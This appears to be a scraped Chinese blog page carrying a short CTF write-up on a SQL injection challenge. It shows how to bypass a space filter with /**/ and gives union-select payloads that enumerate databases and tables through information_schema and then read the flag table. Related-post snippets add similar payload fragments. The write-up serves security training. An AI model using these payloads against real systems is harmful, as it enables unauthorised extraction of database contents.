ctf简单的SQL注入（1）

最新推荐文章于 2024-09-05 03:15:24 发布

wuerror

最新推荐文章于 2024-09-05 03:15:24 发布

阅读量2.3k

点赞数 1

分类专栏： ctf 文章标签： ctf

本文链接：https://blog.csdn.net/weixin_40871137/article/details/81047020

版权

ctf 专栏收录该内容

28 篇文章 1 订阅

订阅专栏

ctf注入套路（一）：从系统内置的库来找到flag所在的表。

例子：点击打开链接（实验吧简单的SQL注入之2,1也是同样的套路）

先输入1，再输入1'，页面报语法错误，再输入1 '页面出现SQLi detected!，推出空格被它过滤。用/**/来代替空格。

输入

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

接下来查表名:

1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

找到有一个flag表，直接查询内容

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

wuerror

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTF文件隐写总结之图片

程序员阿飘的博客

01-09

837

本文已参与「新人创作礼」活动，一起开启掘金创作之路。

CTF-实验吧简单的sql注入

才不是小弱鸡的博客

05-07

1681

好吧，其实这题我也是看了wp才知道的写wp的老哥个个都是人才，脑洞很大，知识丰富，还会嘤嘤嘤，我超喜欢的。咳咳咳，跑题了，这题一看就是sql注入嘛（别问我为什么知道，自己看题目名）先进行过滤测试。先试试1 and 1=1，发现返回显然and被过滤了然后继续测试，结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...

参与评论您还未登录，请先登录后发表或查看评论

CTF刷题笔记 - misc方向 - 电子取证内存分析_ctf 镜像恶意进程分析

最新发布

2401_86436851的博客

09-05

1208

首先，分析VMEM文件整体信息然后，通过 lsadump 查看内存中密码凭据的明文缓存数据，得到flag。

ctf小经验sql注入

04-11

sql注入一、找到注入点；二、判断当前表的字段；三、用联合语句查看哪几位是有效位；四、查看当前数据库中有哪些表；五、查看表中有哪些属性；

CTF刷题总结（1）------简单的SQL注入

qq_45047250的博客

04-25

1437

第一次写分享类的文章，有错误的地方还请大家多多指正哈！此篇文章主要分享一些刷web题目中会遇到的一些知识点，之后还会继续分享一些关于这方面的知识。文章目录简单的sql注入预备知识注入前判断如何判断注入顺序及操作总结简单的sql注入 预备知识 schema：可以代表数据库的组织和结构，其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明，大家可以自行体会。 information_schema: 是MySQL自带的信息数据库，用于存储数据库元数据（例如：数

[CTF]简单的sql注入之2

胖胖的ALEX

06-26

659

类型：web 网址：http://www.shiyanbar.com/ctf/1908 攻击：sql注入 一句话总结： id有回显的sql注入（手工） Writeup: 测试发现过滤空格，用/**/代替空格爆数据库名称： 1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/...

实验吧简单的SQL注入1，简单的SQL注入

weixin_30770783的博客

05-07

188

接上面一篇博客。实验吧简单的sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样，直接输入 1加个但引号，结果下面有返回错误，，有错，所以估计这里应该是要闭合，字符行注入，但是这个标题，到底过滤了什么，目前我还不知道过滤了什么，所以先搞一下。。输入 1' and 1=1# 按理...

所谓最简单的SQL注入

扯蛋的青春与蛋痛的生活

01-12

1946

今天没带眼镜,,所以不太想干活也不知怎的, 对公司另一同事写的业务台模块来了兴趣..帮其"测试一下" 在VC的代码片段是 CString SqlText = "Select User_ID, Login_Name, Login_Pwd, Chinese_Name, Operation from A_Employee Where Login_Name = '" +

总结笔记-CTF-SQL注入

qq_39283174的博客

12-22

485

关于SQL注入的相关CTF笔记

[CTF] SQL注入的一些经验总结（未完待续）【更新：2022.11.25】

ZXW_NUDT的博客

11-17

6294

关于SQL注入的思维导图可以点开看一下大图

CTFHUB-web-SQL注入

ookami6497的博客

11-29

854

CTFHUB SQL

CTF中SQL注入常见题型整理.pdf

02-11

### CTF中SQL注入常见题型整理 #### 前言在网络安全竞赛（CTF）中，SQL注入是常见的攻击手法之一。通过对网站输入的数据进行构造，攻击者可以利用SQL注入漏洞获取敏感数据，甚至控制整个数据库。本文将详细介绍...

CTFHub SQL注入

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

02-09

1146

ctfhub的SQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句，根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数首先使用order by 3 ，页面无回显，改为2之后页面显示正确。因此判断当前数据库当前表，共有2个字段。 3、使用联合查询，判断页面显示位首先将id改为一个不存在的纸，根据联合查询的特性，就会返回11111，222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数

非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1（两种解法！）

m0_73734159的博客

11-16

1683

（在使用语句时，如果XPath_string不符合该种类格式，就会出现格式错误，并且会以系统报错的形式提示出错误！（局限性查询字符串长度最大为32位，要突破此限制可使用right(),left()，substr()来截取字符串）没错，又是我，这群该死的黑客竟然如此厉害，所以我回去爆肝SQL注入，这次，再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了（上一个updatexml()函数使用的是()绕过空格限制）函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。

CTFSHOW WEB入门——sql注入

Chur的博客

07-22

4867

ctfshow 靶场 web入门 sql注入系列

实验吧---简单的sql注入

mengtongxch的博客

10-19

541

通过注入获得flag值（提交格式：flag{}）。解题链接： http://ctf5.shiyanbar.com/423/web/ 首先呢点击这个链接，出现以下界面当我们在框里面输入1,2,3的时候会出现一些东西，例如用sqlmap扫描一下爆出其数据库，数据表，字段参考网址：https://www.cnblogs.com/baifan261...

NCTF-南邮网络攻防平台WriteUp：SQL注入1

1cePeak

03-30

1396

****************蒟蒻萌新拿一血**************** SQL注入1 传送门：http://chinalover.sinaapp.com/index.php 先看源码划重点（敲黑板题目要求输入user，password，我们要避开密码的验证，可以构造语句，在输入user的时候把后面的password用#注释掉。输入 admin‘）# 因...

实验吧ctf-web题：简单的sql注入